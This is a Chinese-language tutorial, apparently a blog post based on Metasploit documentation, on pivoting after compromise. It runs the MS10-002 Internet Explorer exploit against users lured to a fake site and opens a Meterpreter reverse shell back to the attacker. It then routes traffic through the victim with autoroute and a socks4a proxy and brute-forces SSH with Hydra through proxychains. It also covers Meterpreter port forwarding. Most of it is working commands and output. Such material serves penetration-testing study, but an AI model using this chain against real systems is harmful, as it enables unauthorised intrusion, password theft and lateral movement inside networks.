metasploit
proxy
我们还可以使用Metasploit框架创建一个隧道,这反过来又允许我们通过它从框架外部运行工具。以下示例显示了一个客户端攻击,在该攻击中,我们诱使用户浏览到我们托管 Internet Explorer 漏洞利用的虚假网站。
msf > use exploit/windows/browser/ms10_002_auroramsf exploit(ms10_002_aurora) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host to listen on.SRVPORT 8080 yes The local port to listen on.SSL false no Negotiate SSL for incoming connectionsSSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)URIPATH no The URI to use for this exploit (default is random)Exploit target:Id Name-- ----0 Automaticmsf exploit(ms10_002_aurora) > set URIPATH /URIPATH => /msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ms10_002_aurora) > set LHOST 192.168.1.101LHOST => 192.168.1.101msf exploit(ms10_002_aurora) > set SRVPORT 80SRVPORT => 80msf exploit(ms10_002_aurora) > set InitialAutoRunScript migrate -fInitialAutoRunScript => migrate -fmsf exploit(ms10_002_aurora) > exploit -j[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.101:4444[*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.1.101:80/[*] Server started.msf exploit(ms10_002_aurora) >
当目标访问我们的恶意 URL 时,将为我们打开一个计量器会话,以便我们完全访问系统。我们不仅从目标接收到meterpreter会话,而且由于我们之前使用的“InitialAutoRunScript”选项,我们的shell自动迁移到另一个进程中,因此如果目标决定关闭浏览器,我们不会丢失它。
msf exploit(ms10_002_aurora) >[*] 192.168.1.201 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption[*] Sending stage (769536 bytes) to 192.168.1.201[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.201:1024) at 2014-10-07 23:43:14 +0300[*] Session ID 1 (192.168.1.101:4444 -> 192.168.1.201:1024) processing InitialAutoRunScript 'migrate -f'[*] Current server process: iexplore.exe (1016)[*] Spawning notepad.exe process to migrate to[+] Migrating to 1416[+] Successfully migrated to processmsf exploit(ms10_002_aurora) > sessions -i 1[*] Starting interaction with 1...meterpreter > background
一旦我们成功获得了一个shell,我们就后台运行了meterpreter会话,以便利用autoroute后模块,这将使我们能够攻击受感染网络中的目标。
[*] Backgrounding session 1...msf exploit(ms10_002_aurora) > use post/windows/manage/autoroutemsf post(autoroute) > show optionsModule options (post/windows/manage/autoroute):Name Current Setting Required Description---- --------------- -------- -----------CMD add yes Specify the autoroute command (accepted: add, print, delete)NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"SESSION yes The session to run this module on.SUBNET no Subnet (IPv4, for example, 10.10.10.0)msf post(autoroute) > set SESSION 1SESSION => 1msf post(autoroute) > set SUBNET 10.1.13.0SUBNET => 10.1.13.0msf post(autoroute) > run[*] Running module against XEN-XP-SP2-BARE[*] Adding a route to 10.1.13.0/255.255.255.0...[*] Post module execution completed
现在我们已经向目标网络添加了一个路由,我们将利用框架中的socks4a辅助工具。这个辅助模块提供了一个代理服务器,它使用我们创建的Metasploit框架路由来中继连接。
msf post(autoroute) > use auxiliary/server/socks4amsf auxiliary(socks4a) > show optionsModule options (auxiliary/server/socks4a):Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The address to listen onSRVPORT 1080 yes The port to listen on.msf auxiliary(auxiliary/server/socks4a) > set SRVPORT 8080SRVPORT => 8080msf auxiliary(auxiliary/server/socks4a) > run[*] Auxiliary module execution completed[*] Starting the socks4a proxy server
我们快速配置proxychins,以匹配我们为代理服务器选择的端口。
root@kali:~# nano /etc/proxychains.confroot@kali:~# cat /etc/proxychains.conf | grep socks4# socks4192.168.1.491080# proxy types: http, socks4, socks5socks4 127.0.0.1 8080
由于一切都已设置好,我们应该能够通过Metasploit创建的隧道运行外部工具,并直接攻击我们的目标网络。
root@kali:~# proxychains hydra -l admin -P passwords.txt -s 22 10.1.13.3 sshProxyChains-3.1 (http://proxychains.sf.net)Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes onlyHydra (http://www.thc.org/thc-hydra) starting at 2014-10-07 23:45:41[DATA] 16 tasks, 1 server, 17 login tries (l:1/p:17), ~1 try per task[DATA] attacking service ssh on port 22...snip...|S-chain|->>-127.0.0.1:8080->>>>-10.1.13.3:22->>>>-OK>>>>-OK>>>>-OK>>>>-OK>>>>-OK...snip...>>>>-OK[22][ssh] host: 10.1.13.3 login: admin password: password11 of 1 target successfully completed, 1 valid password foundHydra (http://www.thc.org/thc-hydra) finished at 2014-10-07 23:45:46
Method 1: Using Socks
msf> use auxiliary/server/socks4amsf> run -j
Method 2: Using autoroute
meterpreter> run autoroute -s $IP/24meterpreter > run autoroute -p
Method 3: Manual route
msf exploit(handler) > route add $IP 255.255.255.0 1
portfwd
在活动的 Meterpreter 会话中,键入 portfwd –h 将显示命令的各种选项和参数。
meterpreter > portfwd -hUsage: portfwd [-h] [add | delete | list | flush] [args]OPTIONS:-L >opt> The local host to listen on (optional).默认 0.0.0.0-h Help banner.-l >opt> The local port to listen on.//本地端口-p >opt> The remote port to connect on.//远程端口-r >opt> The remote host to connect on.//远程主机ipmeterpreter >
比如
远程主机3389 转发到本地3389
meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.191[*] Local TCP relay created: 0.0.0.0:3389 >-> 172.16.194.191:3389meterpreter > //
删除
meterpreter > portfwd delete –l 3389 –p 3389 –r 172.16.194.191
删除所有端口转发
meterpreter > portfwd flush
查看端口转发
meterpreter > portfwd list0: 0.0.0.0:3389 -> 172.16.194.191:33891: 0.0.0.0:1337 -> 172.16.194.191:13372: 0.0.0.0:2222 -> 172.16.194.191:2222
若有收获,就点个赞吧
0 人点赞
